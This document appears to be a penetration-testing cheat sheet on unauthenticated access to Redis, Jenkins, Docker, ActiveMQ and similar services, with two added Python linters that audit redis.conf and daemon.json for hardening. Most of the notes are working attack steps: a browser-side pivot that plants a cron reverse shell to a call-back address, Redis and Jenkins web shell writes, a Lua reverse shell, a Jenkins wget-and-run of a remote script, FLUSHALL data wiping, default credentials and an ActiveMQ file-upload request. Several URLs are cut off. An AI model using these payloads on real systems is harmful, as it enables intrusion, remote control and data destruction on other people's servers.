Redis unauthenticated access
```
> redis-cli -h 127.0.0.1 flushall
192.168.0.110:6379> ping
PONG                      # replies without AUTH: unauthenticated access present

# JS pivot into the intranet (browser-side, via XMLHttpRequest)
# 外网IP is the author's placeholder for the external call-back address
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('flushall\r\n');
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外网IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' + "\r\n");
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('save\r\n');
# Reverse shell (the cron entry written above calls back every minute)

# Write a web shell
6379> config set dir /var/www/html/
6379> config set dbfilename shell.php
6379> set x "<?php phpinfo();?>"
6379> save

# Lua RCE
https:
# Set host in redis_lua.py to the target IP; if it runs and returns normally, reverse shell:
> eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0
```
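Every Redis step above depends on three things the server lets an unauthenticated client do: reach the port, run CONFIG SET dir/dbfilename, and trigger SAVE. The following offline lint of a redis.conf checks the settings that close each of those (bind, protected-mode, requirepass, rename-command). It is an added example, not part of the original notes; the two sample configs are constructed and the password value is a placeholder.

```python
"""Offline lint of a redis.conf for the settings that block the abuse shown in
the notes above (unauthenticated CONFIG SET dir/dbfilename followed by SAVE).
Added example; it is not part of the original notes and the sample configs
are constructed."""

# Addresses that make Redis listen on every interface.
ANY_ADDRESS = {"0.0.0.0", "*", "::"}

# Constructed sample: an unhardened redis.conf.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
dir /var/lib/redis
"""

# Constructed sample: the same instance hardened (password is a placeholder).
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass PLACEHOLDER_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Parse redis.conf text into (settings, disabled_commands, renamed_commands).

    redis.conf only has whole-line '#' comments, and a directive repeated later
    in the file overrides the earlier one, as in Redis itself.
    """
    settings, disabled, renamed = {}, set(), {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "rename-command":
            names = value.split(None, 1)
            if len(names) != 2:
                continue  # malformed directive; Redis itself would refuse to start
            cmd, new_name = names[0].upper(), names[1].strip()
            if new_name in ('""', "''"):
                disabled.add(cmd)          # renaming to "" removes the command
            else:
                renamed[cmd] = new_name    # still callable, under an obscure name
        else:
            settings[key] = value
    return settings, disabled, renamed


def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    settings, disabled, renamed = parse_conf(text)
    findings = []

    # 1. Exposure: no bind line, or a wildcard address, means the port is reachable
    #    from anywhere the host is routable (Redis 6.2 allows an optional '-' prefix).
    binds = settings.get("bind", "").split()
    if not binds or any(b.lstrip("-") in ANY_ADDRESS for b in binds):
        findings.append("bind: listening on all interfaces; bind to 127.0.0.1 or an internal address")

    # 2. protected-mode is the safety net when neither bind nor a password is set.
    if settings.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode no: loopback-only fallback is disabled")

    # 3. Without requirepass every client that reaches the port is fully authenticated.
    #    (Redis 6+ ACL 'user' directives are an alternative this check does not cover.)
    if not settings.get("requirepass"):
        findings.append("requirepass unset: unauthenticated clients get full access")

    # 4. CONFIG SET dir/dbfilename is what turns SAVE into an arbitrary file write;
    #    FLUSHALL is the data-destroying first step in the notes above.
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in disabled and cmd not in renamed:
            findings.append(f'{cmd} reachable under its default name; rename-command {cmd} "" removes it')

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit(conf) or 'no findings'}")
```

Run it against the real file (`audit(open("/etc/redis/redis.conf").read())`); the hardened sample yields no findings, the weak one yields five. Renaming CONFIG to an obscure name instead of "" is treated as mitigated here, but a leaked name restores the file-write primitive, so removing the command is the safer choice where nothing needs it at runtime.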
Jenkins unauthenticated access
```
http:
http:
# Execute a command
> println "ifconfig -a".execute().text
# Reverse shell
> println "wget http://your.com/back.py -P /tmp/".execute().text
> println "python /tmp/back.py yourIP 8080".execute().text
# Write a web shell
> println "wget http://your.com/t.txt -o /var/www/html/1.php".execute().text
> new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);?>');
> def webshell = '<?php @eval($_POST[1]);?>'
> new File("/var/www/html/1.php").write("$webshell");
```
MongoDB unauthenticated access
Default port 27017: connect directly and perform create, read, update and delete operations.
ZooKeeper unauthenticated access
Default port 2181
```
# Get the server's environment information
> echo envi | nc 192.168.0.1 2181
# Connect
> ./zkCli.sh -server ip:port
```
Elasticsearch unauthenticated access
Default port 9200
```
http:
http:
http:
http:
```
Memcache unauthenticated access
Default port 11211
```
> telnet 1.1.1.1 11211
> nc -vv 1.1.1.1 11211
```
Hadoop unauthenticated access
Default port 50070
Docker unauthenticated access
Default port 2375
```
> docker -H tcp:
```
Default password (Shipyard): admin/shipyard
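The Docker note boils down to one condition: the daemon API is listening on TCP without client-certificate verification. The check below reads a daemon.json and flags that condition, and also catches a `tlsverify` that names no certificate files. It is an added example, not from the original notes; the sample configs and certificate paths are constructed, and a `-H tcp://...` given on dockerd's command line (for instance in a systemd unit) is outside what this file-based check can see.

```python
"""Check the Docker daemon's daemon.json for a TCP listener that is reachable
without mutually authenticated TLS, which is the condition behind the
unauthenticated-access note above. Added example, not from the original notes;
the samples and certificate paths are constructed."""
import json

# Constructed sample: API exposed on 0.0.0.0:2375 with no TLS at all.
EXPOSED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed sample: TCP listener kept, but only with client-certificate verification.
PROTECTED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",           # placeholder paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def audit_daemon_json(text):
    """Return findings for the given daemon.json contents (empty list = pass).

    Only the file is inspected: a '-H tcp://...' passed on dockerd's command line
    (e.g. in a systemd unit) is not visible here and must be checked separately.
    """
    cfg = json.loads(text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]

    if tcp_hosts and not cfg.get("tlsverify"):
        # "tls": true on its own only encrypts; it does not authenticate the client.
        findings.append(
            f"{tcp_hosts}: TCP API without tlsverify; any client that reaches the "
            "port controls the daemon, and through it the host")
    if cfg.get("tlsverify"):
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is missing")
    return findings


if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED), ("protected", PROTECTED)):
        print(f"{label}: {audit_daemon_json(conf) or 'no findings'}")
```

Pass the contents of `/etc/docker/daemon.json` to `audit_daemon_json`; an empty result means any TCP listener is protected by client-certificate verification. If the API does not need to be reachable over the network at all, removing the `tcp://` host entirely is simpler than managing certificates.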
ActiveMQ unauthenticated access
Default port 8161
```
http:
PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 1.1.1.1:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

123123123123123123123123123
```